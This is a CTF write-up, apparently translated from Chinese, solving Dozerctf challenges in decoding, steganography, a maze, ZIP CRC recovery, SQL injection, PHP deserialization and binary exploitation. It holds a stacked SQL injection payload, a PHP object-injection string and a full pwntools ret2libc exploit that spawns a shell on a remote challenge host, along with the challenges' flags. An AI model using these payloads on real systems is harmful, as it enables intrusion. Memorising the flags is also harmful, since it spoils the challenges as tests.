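Real Check-in

Challenge: This really is the check-in challenge
Attachment (extraction code: mfvc)

Judging from the attachment's name, this should be base decoding.
After various attempts, it turns out that decoding in the order base64 -> base32 -> base16 -> base58 (the foreign one) yields the flag.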

sqli-labs 0

Challenge: No way, surely there isn't anyone who really can't do injection?

Reference article: https://blog.csdn.net/qq_26406447/article/details/90643951
Resulting payload:

1%2527;handler `uziuzi` open as harvey;handler harvey read first;handler harvey close;

Final flag: flag{594cb6af684ad354b4a59ac496473990}

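py?

Attachment (extraction code: yq52)

This one tests LSB; just steg it and you're done.

Use WinHex to find the useful information, then base64-decode it to get the flag.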


Giveaway Deserialization

Challenge: It can't get any simpler; any simpler and I'd kill myself. The flag is in flag.php

Reference: https://www.cnblogs.com/kevinbruce656/p/11198236.html

Resulting payload:

O: 4:"home": 2:{s: 12:"%00home%00method";s: 5:"mysys";s: 10:"%00home%00args";a: 1:{i:0;s: 8:"flag.php";}}

Final flag: flag{j4nc920fm8b2z0r2mc7dsf87s6785a675sa776vd}

upload

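Challenge: where is the file? (flag format: Dozerctf{XXXXXXXXXXXXXXX})
Attachment (extraction code: swrj)

Analyzing the traffic capture turns up one packet which, once extracted, is an encrypted archive.
At first I searched the capture for the password with no luck, so it looked like brute force was the only option, but the password length wasn't given, which was a headache.
Later, after consulting a reference article, I found out it was a CRC challenge.

CRC tool (extraction code: 926k)

Then brute-forcing text with the same CRC recovers the original content.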





Finally, combining the pieces gives the flag: Dozerctf{can_U_find_thefilefrom_traffic}
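
The CRC step works because, with traditional ZIP encryption, each member's uncompressed size and the CRC-32 of its plaintext stay readable in the archive headers, so very short members can be recovered by enumeration. The Python below is an added example, not the tool or script used in this write-up; the alphabet, the 4-byte limit and the sample fragments are assumptions, and an unencrypted archive built in memory stands in for the challenge file because only header fields are read.

```python
import io
import itertools
import string
import zipfile
import zlib

# Assumed alphabet for the hidden fragments (an assumption, not from the challenge).
ALPHABET = (string.ascii_lowercase + string.digits + "_").encode()


def build_sample_zip(fragments):
    """Constructed sample: one tiny member per fragment, standing in for the real archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for i, frag in enumerate(fragments, 1):
            zf.writestr(f"{i}.txt", frag)
    return buf.getvalue()


def crc_candidates(size, crc, alphabet=ALPHABET):
    """Return every `size`-byte string over `alphabet` whose CRC-32 equals `crc`."""
    return [
        bytes(c) for c in itertools.product(alphabet, repeat=size)
        if zlib.crc32(bytes(c)) == crc
    ]


def recover_from_metadata(zip_bytes, max_size=4):
    """Use only header fields (name, size, CRC); member data is never read."""
    out = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            # Larger members are not practical to enumerate, so skip them.
            if info.file_size <= max_size:
                out[info.filename] = crc_candidates(info.file_size, info.CRC)
    return out


if __name__ == "__main__":
    sample = build_sample_zip([b"crc_", b"leak", b"s_it"])  # constructed plaintexts
    for name, hits in recover_from_metadata(sample).items():
        print(name, hits)
```

Each member may yield more than one candidate when CRC values collide, so the results are lists. Storing short secrets as separate tiny members is what makes the leak usable; a single larger member is not practical to enumerate this way.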

easy_maze

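Challenge: This should be a fairly easy maze! Please submit the final result in Dozerctf{} format.
Attachment (extraction code: 5t57)

Finally, taking the MD5 hash gives the flag: Dozerctf{e2b94144f06fdb08695065331d44b59e}
The script: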

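    #coding:utf-8
    # Maps each intended move (W/A/S/D) through the current key table str3,
    # which is permuted after every move.
    str2=[]                      # moves entered by the user, one character each
    str3=['W','A','S','D']       # current key table
    def en1():
        # swap positions 0 and 2
        s=str3[0]
        str3[0]=str3[2]
        str3[2]=s
    def en2():
        # rotate the table left by one
        s=str3[0]
        str3[0]=str3[1]
        str3[1]=str3[2]
        str3[2]=str3[3]
        str3[3]=s
    def en3():
        # swap positions 1 and 3, then positions 0 and 2
        s=str3[1]
        str3[1]=str3[3]
        str3[3]=s
        s=str3[0]
        str3[0]=str3[2]
        str3[2]=s
    def en4():
        # rotate the table right by one
        s=str3[3]
        str3[3]=str3[2]
        str3[2]=str3[1]
        str3[1]=str3[0]
        str3[0]=s
    def start():
        str4=''
        for i in range(len(str2)):
            # emit the key currently in this move's slot, then permute the table
            if str2[i]=='W':
                str4+=str3[0]
                en1()
            if str2[i]=='A':
                str4+=str3[1]
                en2()
            if str2[i]=='S':
                str4+=str3[2]
                en3()
            if str2[i]=='D':
                str4+=str3[3]
                en4()
        return str4
    if __name__=='__main__':
        # prompt: "Enter the move characters (W/S/A/D = up/down/left/right):"
        str1=input('请输入移动字符(WSAD上下左右):')
        for c in str1:
            str2.append(c)
        print(start())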

ret temp

Challenge: Stop rushing me, stop rushing me, here's the easy challenge you asked for
nc 118.31.11.216 36666
附件(提取码:bg61)

exp:

    from pwn import *
    conn=remote('118.31.11.216',36666)
    #conn=process('./pwn')
    e=ELF('./pwn')
    pad=112
    write_plt=e.symbols['write']
    vul_addr=e.sym['_start']
    bss_addr=e.bss()
    def leak(address):
        payload1='a'*pad+"BBBB"+p32(write_plt)+p32(vul_addr)+p32(1)+p32(address)+p32(4)
        conn.sendline(payload1)
        data=conn.recv(4)
        return data 
    d=DynELF(leak,elf=e)
    system_addr=d.lookup('system','libc')
    print hex(system_addr)
    read_plt=e.symbols['read']
    payload2='a'*pad+"BBBB"+p32(read_plt)+p32(vul_addr)+p32(0)+p32(bss_addr)+p32(8)
    conn.sendline(payload2)
    conn.send("/bin/sh\x00")
    payload3="a"*pad+"BBBB"+p32(system_addr)+'dead'+p32(bss_addr)
    conn.sendline(payload3)
    conn.interactive()

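Something Seems Off

Challenge: Whose course project is this? It's so badly done!
Attachment (extraction code: 71ka)

Download the file and look at the strings inside it: there is a substituted base alphabet and the ciphertext.

Finally, base64 decoding gives the flag: Dozerctf{old_man_is_good_man!}
Script reference: https://blog.csdn.net/hackerwin7/article/details/44749487
(just swap the alphabet table for the one in the program and it works)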